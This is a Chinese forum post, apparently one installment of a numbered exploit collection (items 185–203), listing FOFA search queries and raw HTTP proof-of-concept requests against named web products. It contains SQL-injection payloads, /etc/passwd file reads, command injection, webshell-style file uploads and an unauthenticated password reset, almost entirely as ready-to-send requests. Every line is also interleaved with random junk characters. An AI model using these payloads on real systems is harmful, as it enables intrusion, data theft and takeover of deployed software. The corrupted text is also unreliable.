, j s8 x ?' ^( ^) e3 I' ]% s: x, \6 r4 e6 h7 H% j
2 ^- m/ B1 w7 z: a5 _
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
/ c% [; u& u* v8 d3 s" k5 M Z2 Z% z2 J6 j
8 G) k) ^, K5 \ Q1 Q
185. 瑞友天翼应用虚拟化系统SQL注入
" W9 t( x) |5 K2 C& k4 y7 oversion < 7.0.5.1
5 }( i$ B' M' ^; O% s/ y0 LFOFA:app="REALOR-天翼应用虚拟化系统"
' w6 R# P5 {' J% {* b9 }$ q& `GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1$ Q2 X5 C$ q. ~9 O3 W
Host: host
+ G( Y9 w9 l* m
' g) S3 I% C. w& j2 j' _( B4 Q, Y1 b- M6 S
186. F-logic DataCube3 SQL注入
; j9 D8 O: J# gCVE-2024-31750
' |0 Y+ e# U! WF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
9 M& e* `1 }8 q5 f9 YFOFA:title=="DataCube3"
% o) v! f* c( y Y* H- j* @) rPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1
: }# l/ V" [9 J4 h: K: |Host: your-ip8 r( p$ }3 |( P7 v7 y3 I8 J8 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0/ d3 w+ N! x) d/ w6 T5 i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
. \# ~- @7 Y ?Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 T# }; K" ^% g9 ?% P0 HAccept-Encoding: gzip, deflate6 r& \3 ^, L" n" z, i
Connection: close
* m! h4 r, S: ^Content-Type: application/x-www-form-urlencoded
5 c7 \! [* x- W3 z% A! E5 W& ~
) j+ W L" Q, mreq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
8 b L9 c% u5 d9 C, Z
5 N1 @! R+ ~0 I6 z5 b
/ l- H5 }) v) ^8 A187. Mura CMS processAsyncObject SQL注入; W( u* {) ` r$ M3 p: ~/ N4 c& U; ?
CVE-2024-326407 W5 \' R% n$ S: ~( K% }! I m, W
FOFA:"Mura CMS"2 K5 G' ^( i0 R" s0 X9 m J6 s r
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
+ }- ^$ l; N I' C0 |* cHost: your-ip# o3 K3 J' t5 {7 d; w
Content-Type: application/x-www-form-urlencoded. M0 S) S. u* G( B9 T
5 h" `' W" y% M. i ^' V' k- q7 ?
/ E) B( e# A$ n# c7 h, R$ m4 g5 Y1 G. Fobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
, y! {; \' I2 A/ d: }
! }& @, E% }% C! Q7 K
6 k7 Y) w7 y" s' }8 i188. 叁体-佳会视频会议 attachment 任意文件读取
5 @5 S( W7 Q% U) E5 K8 Oversion <= 3.9.7
0 h: K1 d1 U: Y. t" \FOFA:body="/system/get_rtc_user_defined_info?site_id"
+ G; R* u0 p# B2 N. _( \. M" gGET /attachment?file=/etc/passwd HTTP/1.1
7 S) h, R3 M7 @4 J" c! sHost: your-ip
J/ o2 q" h- K* V5 dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.360 b; O! Q, ]! _) w: I1 S- t) M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 k' @# b0 t& J7 LAccept-Encoding: gzip, deflate. B- v: ~) J" K' q# m/ C
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
8 _1 B) O- J0 Z9 Z% S& ZConnection: close* Y) g* T2 ~3 |5 m: l4 I
& V% k# X9 {; S- r# _, u2 p* X# d" [6 D# V6 H1 H, Q
189. 蓝网科技临床浏览系统 deleteStudy SQL注入! S7 ^, d# U% a, W3 y l
FOFA:app="LANWON-临床浏览系统"
4 W* C& b+ Y ]6 `GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.16 o+ Q, R& M3 _8 U, f2 z" V, m6 y
Host: your-ip
9 m) B: ?6 y kUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
8 X# ?6 ^! b" h- O* W, i3 S: e+ L0 RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- a3 ]! ^2 Z5 n4 G2 K$ Z& lAccept-Encoding: gzip, deflate0 ~) |% K: K) T, G0 g. h1 K
Accept-Language: zh-CN,zh;q=0.9: X" m1 d e3 z8 t0 A3 N! F
Connection: close+ t. v! n- p2 V: ]
& g& U# K! Y; }
1 X% m& {1 E, A190. 短视频矩阵营销系统 poihuoqu 任意文件读取
. n7 [5 F% G3 r7 e5 I8 `/ W% GFOFA:title=="短视频矩阵营销系统"
# w1 \/ j$ o" U* q1 SPOST /index.php/admin/Userinfo/poihuoqu HTTP/2
: l& E: _/ d' g* t! nHost: your-ip4 O! ]! w+ Y6 W( Z# \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
7 b& s, ?# W2 s* c; g0 gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9# T1 D v# D+ _7 t( t! Z
Content-Type: application/x-www-form-urlencoded
; K2 K1 x! V* rAccept-Encoding: gzip, deflate6 Q' v* o& K$ q, G, U: d7 L2 ]
Accept-Language: zh-CN,zh;q=0.9
% b0 T1 T3 r. H5 {4 |4 j p' U$ Z* a8 l
poi=file:///etc/passwd: h' @, Y; R& m$ z( I% I
- t' e- [- [# F F. |% W
( A( U3 i- t! t- _191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入6 p G; w2 o$ J, q6 [0 i
FOFA:body="/CDGServer3/index.jsp"
8 V: u, h7 D, S7 nPOST /CDGServer3/js/../NavigationAjax HTTP/1.1
j h# O" X l ^7 H6 Z% a0 FHost: your-ip
x9 d/ i( r8 K V- s/ EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36# `" Q4 [9 @' q& q- m3 |# N; \
Content-Type: application/x-www-form-urlencoded) P3 h0 d; |5 k
+ s; X3 M1 C" u2 C% Q% o& Gcommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
# T' [$ n" S7 s4 C0 M. q/ h8 r
8 r R( N" {" C( y5 W) t0 Z; v3 I' q; d: f, Y. c
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传( g, ~8 |8 h" ?. y% ^
FOFA:title="用户登录_富通天下外贸ERP"
, C" E+ X- h- L: OPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
1 K) ]# u* |! f8 OHost: your-ip% {+ ]/ U& r9 O" `+ E6 }
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
f+ V7 R( U% s" eContent-Type: application/x-www-form-urlencoded# w& n$ d" _3 i g! V4 |
$ F1 e* W2 p" c! s! ~! c
! o& {2 m; T4 L" t<% @ webhandler language="C#" class="AverageHandler" %>
4 y3 a' ?- S* |, C- busing System;% y$ A. f: y, u) K; v k* n
using System.Web;7 E* `- y- h* Z: I- i8 N1 _" {; h
public class AverageHandler : IHttpHandler
) s. z$ ^ Y) p6 {1 m{
$ a/ v" b: @: L; c4 k5 dpublic bool IsReusable
6 {1 l4 @7 l- j! q{ get { return true; } }
3 x% _) t: R' j$ w( Upublic void ProcessRequest(HttpContext ctx)
' n* q" G' G+ U! G1 d! v) I! w9 _% B{- |0 S _( e9 c# N, } I1 l
ctx.Response.Write("test");2 }) l' X0 Y3 Z V. ]
}
8 l' P% z4 |: `9 G. \+ J5 W}
8 Z2 u" J; X% ~4 x a
% q$ D- D% u7 g$ `& p% j; P9 m* L: M
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行6 q- f j O; ], g2 M @' n5 f
FOFA:body="山石云鉴主机安全管理系统"4 y# L. z0 P0 E: ?# {7 z+ G
GET /master/ajaxActions/getTokenAction.php HTTP/1.14 q/ m9 ~: r8 [
Host:
) D# j9 z* }- Z# u* _4 z! t( UCookie: PHPSESSID=2333333333333;; Q+ n( ]7 i, D7 }* x' V
Content-Type: application/x-www-form-urlencoded9 q: ^/ z4 E- e
User-Agent: Mozilla/5.0
5 q( Q! x: k* t+ K5 U, u
. I: h7 q0 X+ t% B6 K$ s* }
. I" O0 ?2 D( G, k3 v# ~& S+ BPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1$ O @8 _6 \" U- Y
Host:+ d; s/ u1 O; P. O: w% q) T* W
User-Agent: Mozilla/5.04 C" E1 z' r: i, m0 a" |9 o8 @
Accept-Encoding: gzip, deflate$ g7 u2 a- r! v6 D! T O
Accept: */*
8 Z( y0 _( k& G8 l; HConnection: close
3 D% A6 u. D( t' @1 k& y& F& ACookie: PHPSESSID=2333333333333;
7 ^9 w$ a0 w' {/ kContent-Type: application/x-www-form-urlencoded
, c& H4 k2 N: }0 j' ~( b. iContent-Length: 84, j: d' T5 d$ ?
/ C8 c0 X9 L5 H0 y: l
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
! S+ h' k+ b: Z. x ?# M9 A/ I8 J! `/ @% m/ v& N/ u5 v
/ [( M- x* ?; L9 g; M+ o K" m
GET /master/img/config HTTP/1.12 I* T9 i8 M& a: q- O
Host:
0 G I. O, G+ X GUser-Agent: Mozilla/5.07 v8 a- Z! @" [5 i) E! P, X X
/ B; @- j( l4 D2 a5 P% H5 g
$ K- h" T- _6 B7 G n194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
2 S; R, d8 X9 y: G& }& L7 ~FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
8 T. S/ J9 {" _' o; Q: ^. y) q# W! O" i/ B
POST /servlet/uploadAttachmentServlet HTTP/1.1
2 O- A6 L% t3 y$ i8 }Host: host' Z$ ~3 F% i, z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36$ V7 Q1 m, B( D. R8 Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
; F7 y' c4 ~, L4 |Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- A! z. i( {. B" a3 _
Accept-Encoding: gzip, deflate: R2 U" c I) [
Connection: close
& i0 u4 g* L4 D6 p) V/ a AContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk# i1 N: A7 D! {9 _& C$ _
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
2 Z5 {; P k! ^ |+ t
" A9 L9 u- a8 a* j- g: K& G7 S! CContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
! \& c7 O' D/ aContent-Type: text/plain
! P S% ]* p! v& D; t+ ~<% out.println("hello");%>: a( f9 ^/ b% s
------WebKitFormBoundaryKNt0t4vBe8cX9rZk7 |1 u$ i% R5 N( L/ {& g- H' C
Content-Disposition: form-data; name="json"
6 P+ f+ a. J- a. x5 f" l {"iq":{"query":{"UpdateType":"mail"}}}/ m, g r8 _% g. A
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
6 X+ y/ R* F9 \7 j% P
+ |" T9 S4 r; B7 D/ ], d9 Z1 r# V/ }( w6 t) B9 I# I
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行4 {) j3 ] M, J5 `0 S; c/ }
FOFA:title=="飞鱼星企业级智能上网行为管理系统
+ p3 P- i/ G$ m9 h- ?9 jPOST /send_order.cgi?parameter=operation HTTP/1.1/ |# o1 u5 G: Q0 { t {
Host: 127.0.0.1
7 c3 d: F! @- R% p0 XPragma: no-cache
" u9 Z* Y% O% Y# n$ U* iCache-Control: no-cache+ d$ T" ]* f- E% d% @! n! P. k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
0 B8 {$ g% _' F$ f: RAccept: */*1 ]: R) U: U- d8 c& J
Accept-Encoding: gzip, deflate
8 k: F& E' M( A$ @Accept-Language: zh-CN,zh;q=0.9
/ L# h8 f# B! U$ LConnection: close4 T4 k0 x2 L2 w2 \
Content-Type: application/x-www-form-urlencoded
2 Q) A, B9 {- S; S4 k: uContent-Length: 68
# @. x# f; v# k2 v* a/ Y' a/ L( n6 H: X3 a2 Q+ V! G6 {
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
$ Y3 i1 m" w& Z9 _- G- u0 c. Q& z+ S( p
2 @2 D7 N% Y. n1 ], v [/ y1 S
196. 河南省风速科技统一认证平台密码重置+ x, w/ g/ s C2 T9 B9 \% ~: S
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"3 `9 x% U& g4 D- w* g- C
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
7 q7 U- f9 v9 ~3 FUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.367 r' C5 c; \" M7 r: L4 n
Content-Type: application/json;charset=UTF-8$ |6 B; e+ \2 i" T8 o4 _3 F) }
X-Requested-With: XMLHttpRequest
9 ]* W, A% `+ u) z8 f( d9 z0 THost:0 n' J& ?6 g% v
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2) ]4 E0 C/ C0 L( s! `1 V1 |+ f
Content-Length: 45
( x( S9 y4 _9 S* FConnection: close
# D+ v$ Z" Y) J- z6 W& w: F- {
: {- {& `0 N2 J& X# w{"xgh":"test","newPass":"test666","email":""}5 b4 Q! J, s+ e3 F. U$ v4 b$ s1 j
1 I7 C( g1 L. u( ?8 b% Z2 R, a# V n' w
' Z+ n' J3 L- ]* P$ x
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入7 m) i* z {+ g% V# r0 z
FOFA:app="浙大恩特客户资源管理系统"
- m# B- d. J1 ~GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
/ B/ ]6 y; s2 P6 Y3 u9 aHost:
+ C9 m0 B0 n, { Z {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36) f3 |; r, d7 L' {8 F
Accept-Encoding: gzip, deflate& Z. A+ s% y$ z# Y- A
Connection: close9 U& r' K4 Q; v+ j5 B' a4 T$ O `
3 y: M0 f, \+ n" p4 @
, M7 c/ @; L# H8 J% C' K
" b7 H) n; v7 [9 f198. 阿里云盘 WebDAV 命令注入
* S4 g' R/ ^: q Y XCVE-2024-29640
& F: S, L/ Q) i9 X# RGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
( r8 O8 e5 C1 P, E" v4 p2 ECookie: sysauth=41273cb2cffef0bb5d0653592624cf64
9 {9 ?. b$ T2 f' z) w5 ~! KAccept: */*
) c0 ]% k" `* ~ F4 lAccept-Encoding: gzip, deflate/ |9 |8 j/ I k* } I
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
) F$ ^* `1 T" @( RConnection: close1 R. H5 _5 i1 H/ a; c( O; k4 l
, |7 @( ?' ^. I/ G
, \ h" H( ?, V199. cockpit系统assetsmanager_upload接口 文件上传
& \9 v$ `! n2 U- Z! x
8 J$ g3 O0 O5 R' J# q" s1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:% i" U( U9 z/ J6 w d, s
GET /auth/login?to=/ HTTP/1.1
4 Q% D5 X+ I/ J2 w( R# Q* z @- K. ~2 F! [5 ~
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
5 X0 a5 b2 z3 O% T5 Y
# Q! B3 f O; o2.使用刚才上一步获取到的jwt获取cookie:
0 j3 j0 J, d0 Q2 p) H. a2 U; b7 |& b* H; j3 U; Z, |# c# X& D
POST /auth/check HTTP/1.1; l9 y1 X7 f2 I
Content-Type: application/json% h- {' a1 B" L% W
# ?7 F8 q8 r8 U- ^7 H{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}8 c0 c! j4 _/ e( F3 X
3 N# Q, a% o5 G' B6 d) @响应:200,返回值:2 P* R, g A( e6 u
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
: l3 P4 u" K+ R* s2 uFofa:title="Authenticate Please!"( E% q0 ]' d( r7 b2 r, g8 H/ k
POST /assetsmanager/upload HTTP/1.1
{8 @$ \/ S$ w; v& E: X# AContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3. X7 {* ^ V/ g8 y0 u3 r& |% {) {
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92
& k3 |" V3 N4 k! ~- i
" m$ v7 L9 c' {-----------------------------36D28FBc36bd6feE7Fb37 |& J& j& A. [ C4 z8 P
Content-Disposition: form-data; name="files[]"; filename="tttt.php"9 _4 O' a7 I8 F1 c$ T, }- J8 X
Content-Type: text/php0 k+ f. X! t3 {+ I! F* e
( J& g" p% h4 u( V) x
<?php echo "tttt";unlink(__FILE__);?>* d9 C2 ~" ^3 E+ g! Q! D( w, s
-----------------------------36D28FBc36bd6feE7Fb3
+ q* H# e. r; g9 I6 @Content-Disposition: form-data; name="folder"7 f! \2 E! z% K2 k/ i
! D) J" h# U( E% M3 l$ Y2 X-----------------------------36D28FBc36bd6feE7Fb3--
4 |/ Q* g z' a6 m r# G. E4 t* i' u, L
1 `. A# G8 d: f# C
/storage/uploads/tttt.php2 `9 k" l4 c& l% T, U1 F6 n
* y& [9 S, m) j9 \200. SeaCMS海洋影视管理系统dmku SQL注入
) @. y1 N! b8 c$ RFOFA:app="海洋CMS"2 X5 a) F1 v8 ~. g0 v; w
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1' Y4 B2 S+ H1 F8 D' i
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s5 p& q: A% X* ~ Z, g) c1 j4 N
Upgrade-Insecure-Requests: 1
3 v. u5 Z0 e9 B& K; W% Z6 HCache-Control: max-age=0
1 X+ ]3 ]8 b& N0 s+ E8 vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% G9 _$ V) Z, g" P+ {
Accept-Encoding: gzip, deflate/ `2 B7 Q8 k! W$ Z' i0 u
Accept-Language: zh-CN,zh;q=0.9
' [6 U; V V% p- x+ W) J* ~" Y! F/ a' b: S$ J* d, u
9 u, G, k' S. J1 b1 @201. 方正全媒体新闻采编系统 binary SQL注入
3 r* v& J% e" y/ q4 o5 zFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"- h- Q" T6 u2 t
POST /newsedit/newsplan/task/binary.do HTTP/1.1
- ?7 [7 L7 @) w, E3 L* F+ J, [Content-Type: application/x-www-form-urlencoded* E H6 r7 P- @* F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 @1 g; O$ \: N' @Accept-Encoding: gzip, deflate* k _( x2 \9 `0 ^
Accept-Language: zh-CN,zh;q=0.9
0 J b3 ~1 ]& D5 Q2 ~; ~Connection: close; s( d" o! G* o# e, ~: l$ X
% U; O" k1 D; O
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1* U: h8 E I4 e' c% K
( C5 _4 L8 E: `7 N! ?3 k4 ~
3 i" V1 l# }. h9 s/ E
202. 微擎系统 AccountEdit任意文件上传
9 a, l. _1 |: A3 y# k" mFOFA:body="/Widgets/WidgetCollection/"2 o6 p& g' t$ n! y
获取__VIEWSTATE和__EVENTVALIDATION值
2 I3 @0 T5 ?/ O, s9 u+ c" k* }6 PGET /User/AccountEdit.aspx HTTP/1.18 ?# v; C7 d1 }, Y9 W# w$ F- U
Host: 滑板人之家; h4 U( x+ W& q. ` E( R+ C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31* K; ~$ g; O0 s$ ~* B
Content-Length: 0
2 w9 A4 a7 y3 _" q! `/ w% y: m- z. V- ?6 B/ y& F _/ ~
8 W" l U$ c6 n! E/ f替换__VIEWSTATE和__EVENTVALIDATION值/ ?/ ], \- J9 O' r! f/ G9 x6 _
POST /User/AccountEdit.aspx HTTP/1.1
' E* F$ e5 I5 \. S( `( H& a. bAccept-Encoding: gzip, deflate, br% N" Q6 X8 ~. o( I0 {0 L8 x
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687- s4 w) [7 T& G. f8 z
! C5 K' F% Q7 Y& E- z( B7 y& [-----------------------------786435874t38587593865736587346567358735687- R) ]' q9 N/ F, y2 H: {5 g$ c
Content-Disposition: form-data; name="__VIEWSTATE"
% N4 Q4 r6 `4 t9 g; j% D
( J) [3 x3 Y. `% z1 c8 b. a__VIEWSTATE& V* f K5 C2 k- H
-----------------------------786435874t38587593865736587346567358735687
# G; [* e `6 q- C3 @2 G* P9 yContent-Disposition: form-data; name="__EVENTVALIDATION"2 }5 I2 ^" s, S% {
8 m: O! n, x, R0 i: e__EVENTVALIDATION& |4 D; `2 w9 m, p; q( M* Z9 g
-----------------------------786435874t38587593865736587346567358735687* C @9 N( ^, i( K4 _1 Z
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
$ ~3 T( V; ^9 n. {5 t* FContent-Type: text/plain S( ?# Y4 D3 B5 v* T% s5 C
$ r9 M5 F: m8 c. H( y7 B( c! V
Hello World!
; P M0 G0 h5 f-----------------------------786435874t385875938657365873465673587356870 M$ i: n: ^1 \
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"' E2 G m. a+ S6 F8 c5 E: s
: T6 S2 c, ]) Q+ x- ?6 W上传图片, {2 `$ ]) k$ ]0 ^0 K
-----------------------------786435874t38587593865736587346567358735687
6 g3 j& v2 c/ `7 g2 fContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
# ^ g6 v3 L8 O# K
# I8 x1 z9 p7 ~* T; q) U
+ X# N& Y' f, l7 F0 R7 L0 X# p-----------------------------786435874t38587593865736587346567358735687
. E" L- W+ ^ O: p, i |( {2 pContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"5 ?9 a7 ^* Q9 w, U1 @& Q" Q6 }
$ h$ O' z/ o% v
% J H. s% p! O2 w7 X
-----------------------------786435874t38587593865736587346567358735687--
5 o) k# e; v6 E4 ~- F R
# E# Z. W+ h% D7 H1 K9 G4 `' ?# G! v7 ?: [
/_data/Uploads/1123.txt( c+ X6 {1 a; R) e1 p/ s4 A( ^4 y, N
6 p, D+ p7 h: t& K- b$ ]. R1 e203. 红海云EHR PtFjk 文件上传
2 Y% u- D1 F: m6 M1 i. n! [& Z0 r: WFOFA:body="RedseaPlatform"" K- P. k8 d" y T
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
& }# }& t9 R; B$ V& O8 X5 ?Host: x.x.x.x
- v. h8 j4 K. ]7 L" c7 }* BAccept-Encoding: gzip0 P8 p- X D5 P5 D3 c* W
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
5 H' G7 F- Q) I3 D8 k6 {Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4/ F2 v/ X [3 y' r4 M/ j* A
Content-Length: 210
8 K. [# y; I7 D# u. z' I7 R5 y. ?% e# U, f5 j$ d. c6 O
------WebKitFormBoundaryt7WbDl1tXogoZys4 K5 P# `/ P/ V+ {. p
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"! _& i/ k$ V7 \
Content-Type:image/jpeg9 C( L- G7 k4 Q) K( U( f
' G0 O6 n) p. T+ a8 E' J
<% out.print("hello,eHR");%>
4 e% |1 ]8 V' b# _: z' [9 Q9 e* F------WebKitFormBoundaryt7WbDl1tXogoZys4--
. ~* M2 T/ s& X
5 f9 c, X% L" ^$ J! Z: \
; z: k/ w; A4 ]4 n3 Y/ d6 o
9 a' X& V A( |. P7 y* x( U2 p
$ Z8 ]! L$ p9 F% `
) n& c: f+ U, y/ n' t! @
) X( S5 J# q, f |
发表于 2024-6-5 14:31:29
收藏
支持
反对